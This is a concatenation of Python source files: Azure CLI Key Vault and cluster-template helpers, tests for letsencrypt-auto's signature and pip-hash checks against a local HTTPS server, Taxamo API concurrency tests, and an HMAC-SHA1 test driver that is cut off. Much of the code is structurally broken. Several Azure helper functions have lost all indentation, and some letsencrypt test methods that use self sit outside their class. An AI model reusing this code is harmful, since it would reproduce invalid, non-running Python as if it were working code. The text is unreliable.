    from azure.cli.core._profile import Profile
    from azure.keyvault import KeyVaultAuthentication  # pylint: unused-variable, reimported
    def get_token(server, resource, scope):  # pylint: disable=unused-argument
        # Reuse the CLI profile's token; _token_retriever is private API but
        # is the established pattern for data-plane auth in this code base.
        return Profile().get_login_credentials(resource)[0]._token_retriever()  # pylint: disable=protected-access
    client = KeyVaultClient(KeyVaultAuthentication(get_token))
    return client
def _create_keyvault(resource_group_name,
                     vault_name,
                     location=None,
                     sku=KeyVaultSkuName.standard.value,
                     enabled_for_deployment=True,
                     enabled_for_disk_encryption=None,
                     enabled_for_template_deployment=None,
                     no_self_perms=None, tags=None):
    # Creates (or updates) a Key Vault. Unless no_self_perms is set, the
    # current user/service principal is granted a broad access policy for
    # keys, secrets, and certificates. Returns the create_or_update result.
    from azure.mgmt.keyvault.models import VaultCreateOrUpdateParameters
    from azure.cli.core._profile import Profile, CLOUD
    from azure.graphrbac.models import GraphErrorException
    profile = Profile()
    # Graph credentials are needed to resolve the caller's AAD object id.
    cred, _, tenant_id = profile.get_login_credentials(
        resource=CLOUD.endpoints.active_directory_graph_resource_id)
    graph_client = GraphRbacManagementClient(cred,
                                             tenant_id,
                                             base_url=CLOUD.endpoints.active_directory_graph_resource_id)  # pylint: disable=line-too-long
    subscription = profile.get_subscription()
    if no_self_perms:
        access_policies = []
    else:
        permissions = Permissions(keys=[KeyPermissions.get,
                                        KeyPermissions.create,
                                        KeyPermissions.delete,
                                        KeyPermissions.list,
                                        KeyPermissions.update,
                                        KeyPermissions.import_enum,
                                        KeyPermissions.backup,
                                        KeyPermissions.restore],
                                  secrets=[SecretPermissions.get,
                                           SecretPermissions.list,
                                           SecretPermissions.set,
                                           SecretPermissions.delete,
                                           SecretPermissions.backup,
                                           SecretPermissions.restore,
                                           SecretPermissions.recover],
                                  certificates=[CertificatePermissions.get,
                                                CertificatePermissions.list,
                                                CertificatePermissions.delete,
                                                CertificatePermissions.create,
                                                CertificatePermissions.import_enum,
                                                CertificatePermissions.update,
                                                CertificatePermissions.managecontacts,
                                                CertificatePermissions.getissuers,
                                                CertificatePermissions.listissuers,
                                                CertificatePermissions.setissuers,
                                                CertificatePermissions.deleteissuers,
                                                CertificatePermissions.manageissuers,
                                                CertificatePermissions.recover])
        try:
            # Preferred: ask Graph directly who the current user is.
            object_id = _get_current_user_object_id(graph_client)
        except GraphErrorException:
            # Fallback: derive the object id from subscription metadata.
            object_id = _get_object_id(graph_client, subscription=subscription)
        if not object_id:
            raise CLIError('Cannot create vault.\n'
                           'Unable to query active directory for information '
                           'about the current user.\n'
                           'You may try the --no-self-perms flag to create a vault'
                           ' without permissions.')
        access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
                                             object_id=object_id,
                                             permissions=permissions)]
    properties = VaultProperties(tenant_id=tenant_id,
                                 sku=KeyVaultSku(name=sku),
                                 access_policies=access_policies,
                                 vault_uri=None,
                                 enabled_for_deployment=enabled_for_deployment,
                                 enabled_for_disk_encryption=enabled_for_disk_encryption,
                                 enabled_for_template_deployment=enabled_for_template_deployment)
    parameters = VaultCreateOrUpdateParameters(location=location,
                                               tags=tags,
                                               properties=properties)
    client = keyvault_client_factory().vaults
    return client.create_or_update(resource_group_name=resource_group_name,
                                   vault_name=vault_name,
                                   parameters=parameters)
# Reuse the SDK's property documentation for this wrapper.
_create_keyvault.__doc__ = VaultProperties.__doc__
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.objects.get_current_user()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
    """Derive the caller's AAD object id from the subscription's login
    metadata. Returns None (with a warning) for unknown credential types."""
    user = subscription['user']
    if not user:
        logger.warning('Current credentials are not from a user or service principal. '
                       'Azure Key Vault does not work with certificate credentials.')
        return None
    user_type = user['type']
    if user_type == 'user':
        return _get_object_id_by_upn(graph_client, user['name'])
    if user_type == 'servicePrincipal':
        return _get_object_id_by_spn(graph_client, user['name'])
    logger.warning("Unknown user type '%s'", user_type)
    return None
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
    """Resolve an AAD object id, preferring an explicit spn, then upn,
    then falling back to the subscription's login metadata."""
    if spn:
        return _get_object_id_by_spn(graph_client, spn)
    if upn:
        return _get_object_id_by_upn(graph_client, upn)
    return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
                                         cluster_name,
                                         admin_password,
                                         certificate_thumbprint,
                                         vault_id,
                                         certificate_id,
                                         reliability_level,
                                         admin_name,
                                         cluster_size,
                                         durability_level,
                                         vm_sku,
                                         os_type,
                                         linux):
    """Load the default template's parameter file and fill in deployment values."""
    parameter_file, _ = _get_template_file_and_parameters_file(linux)
    parameters = get_file_json(parameter_file)['parameters']
    if parameters is None:
        raise CLIError('Invalid parameters file')
    # Table of parameter-name -> value keeps the assignments in one place.
    values = {
        'clusterLocation': cluster_location,
        'clusterName': cluster_name,
        'adminUserName': admin_name,
        'adminPassword': admin_password,
        'certificateThumbprint': certificate_thumbprint,
        'sourceVaultvalue': vault_id,
        'certificateUrlvalue': certificate_id,
        'reliabilityLevel': reliability_level,
        'nt0InstanceCount': int(cluster_size),
        'durabilityLevel': durability_level,
        'vmSku': vm_sku,
        'vmImageSku': os_type,
    }
    for key, value in values.items():
        parameters[key]['value'] = value
    return parameters
def _set_parameters_for_customize_template(resource_group_name,
                                           certificate_file,
                                           certificate_password,
                                           vault_name,
                                           vault_resource_group_name,
                                           certificate_output_folder,
                                           certificate_subject_name,
                                           secret_identifier,
                                           parameter_file):
    """Fill certificate parameters in a user-supplied ARM parameters file.

    For each certificate block (primary: sourceVaultValue /
    certificateThumbprint / certificateUrlValue; secondary: the sec*-prefixed
    names) either all three parameter names must be present (a certificate is
    created and plugged in) or none of them (the block is skipped); anything
    in between raises CLIError.

    :return: (parameters, output_file) where output_file is the generated
        .pem path of the primary certificate, or None.
    """
    parameters = get_file_json(parameter_file)['parameters']
    if parameters is None:
        raise CLIError('Invalid parameters file')
    mismatch_error = ('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
                      'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
    # BUG FIX: output_file was unbound (NameError at return) when the primary
    # certificate parameters were absent.
    output_file = None
    if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
        logger.info('Found primary certificate parameters in parameters file')
        result = _create_certificate(resource_group_name,
                                     certificate_file,
                                     certificate_password,
                                     vault_name,
                                     vault_resource_group_name,
                                     certificate_output_folder,
                                     certificate_subject_name,
                                     secret_identifier)
        parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
        parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
        parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
        output_file = result[3]
    elif SOURCE_VAULT_VALUE in parameters or CERTIFICATE_THUMBPRINT in parameters or CERTIFICATE_URL_VALUE in parameters:
        # Some but not all primary names present: reject.
        raise CLIError(mismatch_error)
    else:
        logger.info(
            'Primary certificate parameters are not present in parameters file')
    if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
        logger.info('Found secondary certificate parameters in parameters file')
        result = _create_certificate(resource_group_name,
                                     certificate_file,
                                     certificate_password,
                                     vault_name,
                                     vault_resource_group_name,
                                     certificate_output_folder,
                                     certificate_subject_name,
                                     secret_identifier)
        # BUG FIX: the original wrote these into the PRIMARY parameter names,
        # clobbering the primary certificate values.
        parameters[SEC_SOURCE_VAULT_VALUE]['value'] = result[0]
        parameters[SEC_CERTIFICATE_URL_VALUE]['value'] = result[1]
        parameters[SEC_CERTIFICATE_THUMBPRINT]['value'] = result[2]
    elif SEC_SOURCE_VAULT_VALUE in parameters or SEC_CERTIFICATE_THUMBPRINT in parameters or SEC_CERTIFICATE_URL_VALUE in parameters:
        raise CLIError(mismatch_error)
    else:
        logger.info(
            'Secondary certificate parameters are not present in parameters file')
    return parameters, output_file
def _modify_template(linux):
    """Load the bundled ARM template JSON for the requested OS flavor."""
    _, template_file = _get_template_file_and_parameters_file(linux)
    return get_file_json(template_file)
|
auto_test.py | """Tests for letsencrypt-auto"""
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from contextlib import contextmanager
from functools import partial
from json import dumps
from os import chmod, environ, makedirs
from os.path import abspath, dirname, exists, join
import re
from shutil import copy, rmtree
import socket
import ssl
from stat import S_IRUSR, S_IXUSR
from subprocess import CalledProcessError, Popen, PIPE
import sys
from tempfile import mkdtemp
from threading import Thread
from unittest import TestCase
from pytest import mark
# NOTE(review): presumably skipped because pytest's default "test*" function
# collection would otherwise pick this helper up as a test -- confirm.
@mark.skip
def tests_dir():
    """Return a path to the "tests" directory."""
    return dirname(abspath(__file__))
# Make the parent directory importable so the local `build` module resolves.
sys.path.insert(0, dirname(tests_dir()))
from build import build as build_le_auto
class RequestHandler(BaseHTTPRequestHandler):
    """An HTTPS request handler which is quiet and serves a specific folder."""

    def __init__(self, resources, *args, **kwargs):
        """
        :arg resources: A dict of resource paths pointing to content bytes
        """
        self.resources = resources
        BaseHTTPRequestHandler.__init__(self, *args, **kwargs)

    # `format` shadows the builtin, but the name is fixed by the base class.
    def log_message(self, format, *args):
        """Don't log each request to the terminal."""

    def do_GET(self):
        """Serve a GET request."""
        content = self.send_head()
        if content is not None:
            self.wfile.write(content)

    def send_head(self):
        """Common code for GET and HEAD commands

        This sends the response code and MIME headers and returns either a
        bytestring of content or, if none is found, None.
        """
        path = self.path[1:]  # Strip leading slash.
        content = self.resources.get(path)
        if content is None:
            self.send_error(404, 'Path "%s" not found in self.resources' % path)
        else:
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.send_header('Content-Length', str(len(content)))
            self.end_headers()
            return content
def server_and_port(resources):
    """Return an unstarted HTTPS server and the port it will use."""
    # Find a port, and bind to it. I can't get the OS to close the socket
    # promptly after we shut down the server, so we typically need to try
    # a couple ports after the first test case. Setting
    # TCPServer.allow_reuse_address = True seems to have nothing to do
    # with this behavior.
    worked = False
    for port in xrange(4443, 4543):  # Python-2 xrange: this file targets py2
        try:
            server = HTTPServer(('localhost', port),
                                partial(RequestHandler, resources))
        except socket.error:
            pass
        else:
            worked = True
            # NOTE(review): ssl.wrap_socket is deprecated (removed in
            # Python 3.12); acceptable here since the suite runs on py2.
            server.socket = ssl.wrap_socket(
                server.socket,
                certfile=join(tests_dir(), 'certs', 'localhost', 'server.pem'),
                server_side=True)
            break
    if not worked:
        raise RuntimeError("Couldn't find an unused socket for the testing HTTPS server.")
    return server, port
@contextmanager
def serving(resources):
    """Spin up a local HTTPS server, and yield its base URL.

    Use a self-signed cert generated as outlined by
    https://coolaj86.com/articles/create-your-own-certificate-authority-for-
    testing/.
    """
    server, port = server_and_port(resources)
    server_thread = Thread(target=server.serve_forever)
    try:
        server_thread.start()
        yield 'https://localhost:{port}/'.format(port=port)
    finally:
        # Always stop the server and reap the thread, even if the body raised.
        server.shutdown()
        server_thread.join()
LE_AUTO_PATH = join(dirname(tests_dir()), 'letsencrypt-auto')
@contextmanager
def temp_paths():
    """Creates and deletes paths for letsencrypt-auto and its venv.

    Yields (le_auto_path, venv_path) inside a fresh temp directory, which is
    removed on exit.
    """
    tmp_dir = mkdtemp(prefix='le-test-')  # renamed: `dir` shadowed the builtin
    try:
        yield join(tmp_dir, 'letsencrypt-auto'), join(tmp_dir, 'venv')
    finally:
        rmtree(tmp_dir, ignore_errors=True)
def out_and_err(command, input=None, shell=False, env=None):
    """Run a shell command, and return stderr and stdout as string.

    If the command returns nonzero, raise CalledProcessError.

    :arg command: A list of commandline args
    :arg input: Data to pipe to stdin. Omit for none.

    Remaining args have the same meaning as for Popen.
    """
    process = Popen(command, stdout=PIPE, stdin=PIPE, stderr=PIPE,
                    shell=shell, env=env)
    stdout, stderr = process.communicate(input=input)
    status = process.poll()  # same as in check_output(), though wait() sounds better
    if status:
        failure = CalledProcessError(status, command)
        failure.output = stdout
        raise failure
    return stdout, stderr
def signed(content, private_key_name='signing.key'):
    """Return the signed SHA-256 hash of ``content``, using the given key file."""
    key_path = join(tests_dir(), private_key_name)
    signature, _ = out_and_err(
        ['openssl', 'dgst', '-sha256', '-sign', key_path],
        input=content)
    return signature
def install_le_auto(contents, install_path):
    """Write ``contents`` to ``install_path`` and mark it owner read+execute.

    :arg contents: The contents of the built letsencrypt-auto script
    :arg install_path: The path where to install the script
    """
    with open(install_path, 'w') as script:
        script.write(contents)
    chmod(install_path, S_IRUSR | S_IXUSR)
def run_le_auto(le_auto_path, venv_dir, base_url, **kwargs):
    """Run the prebuilt version of letsencrypt-auto, returning stdout and
    stderr strings.

    If the command returns other than 0, raise CalledProcessError.
    """
    env = environ.copy()
    # Point the script at the local test server and a known keypair.
    d = dict(VENV_PATH=venv_dir,
             # URL to PyPI-style JSON that tell us the latest released version
             # of LE:
             LE_AUTO_JSON_URL=base_url + 'certbot/json',
             # URL to dir containing letsencrypt-auto and letsencrypt-auto.sig:
             LE_AUTO_DIR_TEMPLATE=base_url + '%s/',
             # The public key corresponding to signing.key:
             LE_AUTO_PUBLIC_KEY="""-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsMoSzLYQ7E1sdSOkwelg
tzKIh2qi3bpXuYtcfFC0XrvWig071NwIj+dZiT0OLZ2hPispEH0B7ISuuWg1ll7G
hFW0VdbxL6JdGzS2ShNWkX9hE9z+j8VqwDPOBn3ZHm03qwpYkBDwQib3KqOdYbTT
uUtJmmGcuk3a9Aq/sCT6DdfmTSdP5asdQYwIcaQreDrOosaS84DTWI3IU+UYJVgl
LsIVPBuy9IcgHidUQ96hJnoPsDCWsHwX62495QKEarauyKQrJzFes0EY95orDM47
Z5o/NDiQB11m91yNB0MmPYY9QSbnOA9j7IaaC97AwRLuwXY+/R2ablTcxurWou68
iQIDAQAB
-----END PUBLIC KEY-----""",
             **kwargs)
    env.update(d)
    # shell=True so the script's shebang/interpreter handling matches real use.
    return out_and_err(
        le_auto_path + ' --version',
        shell=True,
        env=env)
def set_le_script_version(venv_dir, version):
    """Tell the letsencrypt script to report a certain version.

    We actually replace the script with a dummy version that knows only how to
    print its version.
    """
    script_path = join(venv_dir, 'bin', 'letsencrypt')
    dummy_script = ("#!/usr/bin/env python\n"
                    "from sys import stderr\n"
                    "stderr.write('letsencrypt %s\\n')" % version)
    with open(script_path, 'w') as script:
        script.write(dummy_script)
    chmod(script_path, S_IRUSR | S_IXUSR)
class AutoTests(TestCase):
    """Test the major branch points of letsencrypt-auto:

    * An le-auto upgrade is needed.
    * An le-auto upgrade is not needed.
    * There was an out-of-date LE script installed.
    * There was a current LE script installed.
    * There was no LE script installed (less important).
    * Pip hash-verification passes.
    * Pip has a hash mismatch.
    * The OpenSSL sig matches.
    * The OpenSSL sig mismatches.

    For tests which get to the end, we run merely ``letsencrypt --version``.
    The functioning of the rest of the certbot script is covered by other
    test suites.
    """
    # Shared fixtures: a freshly built le-auto script pinned at 99.9.9 and
    # its OpenSSL signature (computed with the test signing key).
    NEW_LE_AUTO = build_le_auto(
        version='99.9.9',
        requirements='letsencrypt==99.9.9 --hash=sha256:1cc14d61ab424cdee446f51e50f1123f8482ec740587fe78626c933bba2873a0')
    NEW_LE_AUTO_SIG = signed(NEW_LE_AUTO)
    def test_successes(self):
        """Exercise most branches of letsencrypt-auto.

        They just happen to be the branches in which everything goes well.

        I violate my usual rule of having small, decoupled tests, because...

        1. We shouldn't need to run a Cartesian product of the branches: the
           phases run in separate shell processes, containing state leakage
           pretty effectively. The only shared state is FS state, and it's
           limited to a temp dir, assuming (if we dare) all functions properly.
        2. One combination of branches happens to set us up nicely for testing
           the next, saving code.
        """
        with temp_paths() as (le_auto_path, venv_dir):
            # This serves a PyPI page with a higher version, a GitHub-alike
            # with a corresponding le-auto script, and a matching signature.
            resources = {'certbot/json': dumps({'releases': {'99.9.9': None}}),
                         'v99.9.9/letsencrypt-auto': self.NEW_LE_AUTO,
                         'v99.9.9/letsencrypt-auto.sig': self.NEW_LE_AUTO_SIG}
            with serving(resources) as base_url:
                run_letsencrypt_auto = partial(
                    run_le_auto,
                    le_auto_path,
                    venv_dir,
                    base_url,
                    PIP_FIND_LINKS=join(tests_dir(),
                                        'fake-letsencrypt',
                                        'dist'))
                # Test when a phase-1 upgrade is needed, there's no LE binary
                # installed, and pip hashes verify:
                install_le_auto(build_le_auto(version='50.0.0'), le_auto_path)
                out, err = run_letsencrypt_auto()
                # The script reports its version on stderr's last line.
                self.assertTrue(re.match(r'letsencrypt \d+\.\d+\.\d+',
                                         err.strip().splitlines()[-1]))
                # Make a few assertions to test the validity of the next tests:
                self.assertTrue('Upgrading certbot-auto ' in out)
                self.assertTrue('Creating virtual environment...' in out)
                # Now we have le-auto 99.9.9 and LE 99.9.9 installed. This
                # conveniently sets us up to test the next 2 cases.
                # Test when neither phase-1 upgrade nor phase-2 upgrade is
                # needed (probably a common case):
                out, err = run_letsencrypt_auto()
                self.assertFalse('Upgrading certbot-auto ' in out)
                self.assertFalse('Creating virtual environment...' in out)
def test_phase2_upgrade(self):
    """Test a phase-2 upgrade without a phase-1 upgrade."""
    with temp_paths() as (le_auto_path, venv_dir):
        resources = {'certbot/json': dumps({'releases': {'99.9.9': None}}),
                     'v99.9.9/letsencrypt-auto': self.NEW_LE_AUTO,
                     'v99.9.9/letsencrypt-auto.sig': self.NEW_LE_AUTO_SIG}
        with serving(resources) as base_url:
            venv_bin = join(venv_dir, 'bin')
            makedirs(venv_bin)
            # Make the installed letsencrypt look older than the served
            # release so only the phase-2 (venv) upgrade triggers:
            set_le_script_version(venv_dir, '0.0.1')
            install_le_auto(self.NEW_LE_AUTO, le_auto_path)

            pip_find_links = join(tests_dir(), 'fake-letsencrypt', 'dist')
            out, err = run_le_auto(le_auto_path, venv_dir, base_url,
                                   PIP_FIND_LINKS=pip_find_links)
            # assertIn/assertNotIn give useful diffs on failure:
            self.assertNotIn('Upgrading certbot-auto ', out)
            self.assertIn('Creating virtual environment...', out)
def test_openssl_failure(self):
    """Make sure we stop if the openssl signature check fails."""
    with temp_paths() as (le_auto_path, venv_dir):
        # Serve an unrelated hash signed with the good key (easier than
        # making a bad key, and a mismatch is a mismatch):
        resources = {'': '<a href="certbot/">certbot/</a>',
                     'certbot/json': dumps({'releases': {'99.9.9': None}}),
                     'v99.9.9/letsencrypt-auto': build_le_auto(version='99.9.9'),
                     'v99.9.9/letsencrypt-auto.sig': signed('something else')}
        with serving(resources) as base_url:
            copy(LE_AUTO_PATH, le_auto_path)
            try:
                out, err = run_le_auto(le_auto_path, venv_dir, base_url)
            except CalledProcessError as exc:
                self.assertEqual(exc.returncode, 1)
                # assertIn reports the actual output on mismatch:
                self.assertIn("Couldn't verify signature of downloaded "
                              "certbot-auto.",
                              exc.output)
            else:
                self.fail('Signature check on certbot-auto erroneously passed.')
def test_pip_failure(self):
    """Make sure pip stops us if there is a hash mismatch."""
    with temp_paths() as (le_auto_path, venv_dir):
        resources = {'': '<a href="certbot/">certbot/</a>',
                     'certbot/json': dumps({'releases': {'99.9.9': None}})}
        with serving(resources) as base_url:
            # Build a le-auto script embedding a bad requirements file:
            install_le_auto(
                build_le_auto(
                    version='99.9.9',
                    requirements='configobj==5.0.6 --hash=sha256:badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb'),
                le_auto_path)
            try:
                out, err = run_le_auto(le_auto_path, venv_dir, base_url)
            except CalledProcessError as exc:
                self.assertEqual(exc.returncode, 1)
                # assertIn reports the actual pip output on mismatch:
                self.assertIn("THESE PACKAGES DO NOT MATCH THE HASHES "
                              "FROM THE REQUIREMENTS FILE",
                              exc.output)
                self.assertFalse(
                    exists(venv_dir),
                    msg="The virtualenv was left around, even though "
                        "installation didn't succeed. We shouldn't do "
                        "this, as it foils our detection of whether we "
                        "need to recreate the virtualenv, which hinges "
                        "on the presence of $VENV_BIN/letsencrypt.")
            else:
                self.fail("Pip didn't detect a bad hash and stop the "
                          "installation.")
|
test_concurrency.py | """
Copyright 2020 Taxamo, Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
from threading import Thread
from decimal import Decimal
import unittest
from helper import *
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
def make_transaction_data(total_amount):
    """Build a minimal IE/USD transaction payload with a single line
    carrying *total_amount*."""
    line = {'total_amount': total_amount,
            'custom_id': 'line-100-1'}
    payload = {
        'currency_code': 'USD',
        'billing_country_code': 'IE',
        'tax_country_code': 'IE',
        'transaction_lines': [line],
    }
    return payload
# Shared request payloads; the line amount doubles as a marker for
# asserting which request produced which response.
transaction_data_100 = make_transaction_data(100)
transaction_data_200 = make_transaction_data(200)
transaction_data_300 = make_transaction_data(300)
def thread_fn(api, results):
    """Issue three calculateTax calls and append their totals to *results*.

    Uses the shared *api* when given; otherwise builds a fresh client for
    this thread.
    """
    client = api or taxamo.api.ApiApi(
        taxamo.swagger.ApiClient(TEST_TOKEN, TEST_ADDRESS))
    totals = []
    for data in (transaction_data_100,
                 transaction_data_200,
                 transaction_data_300):
        response = client.calculateTax({'transaction': data})
        totals.append(response.transaction.total_amount)
    results.append(totals)
class TaxamoConcurrencyTest(TaxamoTest):
    """Exercise the taxamo API client under fork- and thread-based concurrency.

    BUG FIX: the fork-based tests previously ignored the children's exit
    status, and an assertion failing in a child propagated into the child's
    copy of the test runner instead of failing the test.  Children now exit
    with a status code (0 only on success) and the parent asserts on it.
    """

    FORK_COUNT = 5
    THREAD_COUNT = 5

    def _new_api(self):
        # One ApiApi instance per process/thread, as these tests exercise.
        return taxamo.api.ApiApi(
            taxamo.swagger.ApiClient(TEST_TOKEN, TEST_ADDRESS))

    def _assert_total(self, api, data, expected):
        # Round-trip one transaction and check the computed total.
        self.assertEqual(
            api.calculateTax({'transaction': data}).transaction.total_amount,
            expected)

    def _fork_child(self, child_fn):
        """Fork; in the child run *child_fn* and hard-exit 0/1.

        os._exit skips unittest/atexit teardown so the forked child never
        continues running the parent's test suite.
        """
        pid = os.fork()
        if pid == 0:
            code = 1
            try:
                child_fn()
                code = 0
            finally:
                os._exit(code)
        return pid

    def _reap_children(self, pids):
        """Wait for every child and fail if any exited non-zero."""
        for pid in pids:
            _, status = os.waitpid(pid, 0)
            self.assertEqual(status, 0)

    def test_forks_apiapi_per_process(self):
        pids = []
        for n in range(self.FORK_COUNT):
            pids.append(self._fork_child(
                lambda: self._assert_total(self._new_api(),
                                           transaction_data_100, 100)))
            # Parent issues its own request while the children run:
            self._assert_total(self._new_api(), transaction_data_200, 200)
        self._reap_children(pids)

    def test_forks_apiapi_per_process_multiple_requests(self):
        def child():
            api_1 = self._new_api()
            self._assert_total(api_1, transaction_data_100, 100)
            self._assert_total(api_1, transaction_data_200, 200)
            self._assert_total(api_1, transaction_data_300, 300)

        pids = []
        for n in range(self.FORK_COUNT):
            pids.append(self._fork_child(child))
            api_2 = self._new_api()
            self._assert_total(api_2, transaction_data_100, 100)
            self._assert_total(api_2, transaction_data_200, 200)
            self._assert_total(api_2, transaction_data_300, 300)
        self._reap_children(pids)

    def _run_threads(self, api):
        """Run THREAD_COUNT thread_fn workers sharing *api* (or None for
        a client per thread) and assert every worker saw correct totals."""
        results = []
        threads = [Thread(target=thread_fn, args=(api, results))
                   for _ in range(self.THREAD_COUNT)]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        self.assertEqual(
            results,
            self.THREAD_COUNT * [[Decimal(100), Decimal(200), Decimal(300)]])

    def test_threads_single_apiapi(self):
        self._run_threads(self._new_api())

    def test_threads_apiapi_per_thread(self):
        self._run_threads(None)
|
test_random_hmac_sha1.py | import binascii
import hashlib
from hashlib import sha1
import hmac
import os
import random
import string
import subprocess
import sys
import time
import threading
import Queue
# Path to the compiled C test binary invoked by run_test().
BIN_PATH = "./build/test_hmac_sha1"
# Defaults; may be overridden by argv[1..3] in the __main__ block below.
NTHREADS = 2
NTESTS = 10
NBYTES = 20
# NOTE(review): 'global' at module scope is a no-op statement.  The flag
# tells worker threads whether the producer is still filling the queue.
global still_making_input
still_making_input = True
tests = Queue.Queue()  # producer/consumer queue of [key, msg, digest] triples
failures = list()      # vectors the C binary disagreed on
#
# Helper functions
#
def random_string(length):
    """Return *length* random bytes hex-encoded (a 2*length-char string).

    Note: the old docstring claimed letters+digits, but the function has
    always produced lowercase hex, which is what the C harness expects.
    The parameter was also renamed from `len`, which shadowed the builtin.
    """
    rand = random.Random()
    return "".join("%.02x" % rand.randint(0, 255) for _ in range(length))
def run_test(key, msg, expected_output):
    """Invoke the C HMAC-SHA1 test binary; its exit code is 0 on a match
    between the C digest and *expected_output*."""
    argv = [BIN_PATH, key, msg, expected_output]
    return subprocess.call(argv)
def run_in_thread(target_function):
    """Run *target_function* on a worker thread, blocking until it returns."""
    worker = threading.Thread(target=target_function)
    worker.start()
    worker.join()
def run_tests():
    """Worker loop: drain the shared `tests` queue through the C binary.

    Runs until the queue is empty AND the producer has finished
    (`still_making_input` cleared by the __main__ block).  Failing
    vectors are collected in the module-level `failures` list.
    """
    while (tests.empty() == False) or (still_making_input == True):
        try:
            # block=True with timeout 0 behaves non-blockingly: raises
            # Queue.Empty immediately when nothing is queued.
            key, msg, out = tests.get(True, 0)
            retcode = run_test(key, msg, out)
            if retcode != 0:
                failures.append([key, msg, out])
                sys.stdout.write("X")  # progress marker: mismatch
            else:
                sys.stdout.write(".")  # progress marker: pass
            sys.stdout.flush()
        except Queue.Empty:
            time.sleep(0.1)  # queue momentarily empty; let producer catch up
def hmac_sha_(key, msg):
    """Reference HMAC-SHA1 via the stdlib hmac module (hex digest)."""
    mac = hmac.new(key, msg, sha1)
    return mac.hexdigest()
def hmac_sha(key, msg):
    """Hand-rolled HMAC-SHA1 (RFC 2104); returns the hex digest.

    BUG FIXES versus the original:
    * Keys longer than the 64-byte block size must be hashed down first
      (RFC 2104 sec. 2).  The old zero-pad of negative length was a no-op,
      producing over-long, incorrect pads.
    * chr()/ord() per character only worked on Python 2 str; bytearray
      handles both Python 2 and 3 byte strings.
    """
    block_size = 64
    key = bytearray(key)
    # RFC 2104: long keys are replaced by their SHA1 digest.
    if len(key) > block_size:
        key = bytearray(hashlib.sha1(bytes(key)).digest())
    # Zero-pad the key to exactly one block.
    key.extend(b'\x00' * (block_size - len(key)))

    outer = hashlib.sha1()
    inner = hashlib.sha1()
    outer.update(bytes(bytearray(b ^ 0x5C for b in key)))  # opad
    inner.update(bytes(bytearray(b ^ 0x36 for b in key)))  # ipad
    inner.update(msg)
    outer.update(inner.digest())
    return outer.hexdigest()
def make_test_input():
    """Producer: enqueue NTESTS [key, msg, expected-digest] triples.

    Keys and messages are hex strings of NBYTES random bytes; the
    expected digest is computed with the local pure-Python HMAC-SHA1.
    """
    for _ in xrange(NTESTS):
        key_hex = random_string(NBYTES)
        msg_hex = random_string(NBYTES)
        digest = hmac_sha(binascii.a2b_hex(key_hex),
                          binascii.a2b_hex(msg_hex))
        tests.put([key_hex, msg_hex, digest])
#
# Test driver
#
if __name__ == "__main__":
    # Optional positional overrides: NTESTS NTHREADS NBYTES (all decimal).
    # Read NTESTS from stdin
    if len(sys.argv) > 1:
        if sys.argv[1].isdigit():
            NTESTS = int(sys.argv[1])
    # Read NTHREADS from stdin
    if len(sys.argv) > 2:
        if sys.argv[2].isdigit():
            NTHREADS = int(sys.argv[2])
    # Read NBYTES from stdin
    if len(sys.argv) > 3:
        if sys.argv[3].isdigit():
            NBYTES = int(sys.argv[3])

    # Tell user what is going to happen
    print("")
    str_threads = "thread"
    if NTHREADS > 1:
        str_threads += "s"
    print("Running %d %s calculating HMAC-SHA1 on %d pairs of random %d-byte strings," % (NTHREADS, str_threads, NTESTS, NBYTES))
    print("comparing the results to the HMAC calculation using Python's hashlib.sha1().")
    print("")

    # Producer thread fills the queue while consumer threads drain it.
    t_mk_input = threading.Thread(target=make_test_input)
    t_mk_input.start()

    # Create new threads
    threadlist = list()
    for i in range(NTHREADS):
